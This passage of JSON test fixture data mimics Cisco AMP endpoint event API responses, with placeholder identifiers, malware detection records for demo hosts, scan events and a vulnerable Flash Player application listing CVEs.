Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688038","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256382891721000,"timestamp":1610705229,"timestamp_nanoseconds":658000000,"date":"2021-01-15T10:07:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256382891720741","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209575793000000,"timestamp":1610705225,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209575793000469","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364862671421000,"timestamp":1610705225,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker","clean":true,"scanned_files":9,"scanned_processes":0,"scanned_paths":2,"malicious_detections":0}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364858376454000,"timestamp":1610705224,"timestamp_nanoseconds":772000000,"date":"2021-01-15T10:07:04+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256331352113000,"timestamp":1610705217,"timestamp_nanoseconds":646000000,"date":"2021-01-15T10:06:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256331352113188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209511368491000,"timestamp":1610705210,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:06:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209511368491028","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364793951945000,"timestamp":1610705209,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:06:49+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft 
Games","clean":true,"scanned_files":30,"scanned_processes":0,"scanned_paths":14,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364789656977000,"timestamp":1610705208,"timestamp_nanoseconds":193000000,"date":"2021-01-15T10:06:48+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft Games"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256279812506000,"timestamp":1610705205,"timestamp_nanoseconds":634000000,"date":"2021-01-15T10:06:45+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256279812505635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209481303720000,"timestamp":1610705203,"timestamp_nanoseconds":152000000,"date":"2021-01-15T10:06:43+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209481303719955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209477008753000,"timestamp":1610705202,"timestamp_nanoseconds":138000000,"date":"2021-01-15T10:06:42+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209477008752658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256228272898000,"timestamp":1610705193,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:06:33+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256228272898082","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209416879210000,"timestamp":1610705188,"timestamp_nanoseconds":769000000,"date":"2021-01-15T10:06:28+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209416879210513","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209412584243000,"timestamp":1610705187,"timestamp_nanoseconds":755000000,"date":"2021-01-15T10:06:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209412584243216","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256181028258000,"timestamp":1610705182,"timestamp_nanoseconds":0,"date":"2021-01-15T10:06:22+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256181028257825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256125193683000,"timestamp":1610705169,"timestamp_nanoseconds":972000000,"date":"2021-01-15T10:06:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256125193682976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256073654075000,"timestamp":1610705157,"timestamp_nanoseconds":960000000,"date":"2021-01-15T10:05:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256073654075423","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533665784395203000,"timestamp":1610705155,"timestamp_nanoseconds":851000000,"date":"2021-01-15T10:05:55+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899829000000,"timestamp":1610705149,"timestamp_nanoseconds":829000000,"date":"2021-01-15T10:05:49+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610705149,"start_date":"2021-01-15T10:05:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"FlashPlayerApp.exe","identity":{"sha256":"c1219f0799e60ff48a9705b63c14168684aed911610fec68548ea08f605cc42b"}},"vulnerabilities":[{"name":"Adobe Flash 
Player","version":"11.5.502.146","cve":"CVE-2013-3333","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3333"},{"cve":"CVE-2014-0502","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0502"},{"cve":"CVE-2014-0498","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0498"},{"cve":"CVE-2014-0497","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0497"},{"cve":"CVE-2014-0492","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0492"},{"cve":"CVE-2014-0491","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0491"},{"cve":"CVE-2013-5332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5332"},{"cve":"CVE-2013-5324","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5324"},{"cve":"CVE-2013-5329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5329"},{"cve":"CVE-2013-5330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5330"},{"cve":"CVE-2013-3361","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3361"},{"cve":"CVE-2013-3362","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3362"},{"cve":"CVE-2013-3363","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3363"},{"cve":"CVE-2013-3344","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3344"},{"cve":"CVE-2013-3345","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3345"},{"cve":"CVE-2013-3347","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3347"},{"cve":"CVE-2013-3343","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3343"},{"cve":"CVE-2013-2728","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2728"},{"cve":"CVE-2013-3324","score":10,"url":"https://web.nvd.nis
t.gov/view/vuln/detail?vulnId=CVE-2013-3324"},{"cve":"CVE-2013-3325","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3325"},{"cve":"CVE-2013-3326","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3326"},{"cve":"CVE-2013-3327","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3327"},{"cve":"CVE-2013-3328","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3328"},{"cve":"CVE-2013-3329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3329"},{"cve":"CVE-2013-3330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3330"},{"cve":"CVE-2013-3331","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3331"},{"cve":"CVE-2013-3332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3332"},{"cve":"CVE-2013-3334","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3334"},{"cve":"CVE-2013-3335","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3335"},{"cve":"CVE-2013-1378","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1378"},{"cve":"CVE-2013-1379","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1379"},{"cve":"CVE-2013-1380","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1380"},{"cve":"CVE-2013-2555","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2555"},{"cve":"CVE-2013-0646","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0646"},{"cve":"CVE-2013-0650","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0650"},{"cve":"CVE-2013-1371","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1371"},{"cve":"CVE-2013-1375","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1375"},{"cve":"CVE-2013-0504","score":10,"url":"https
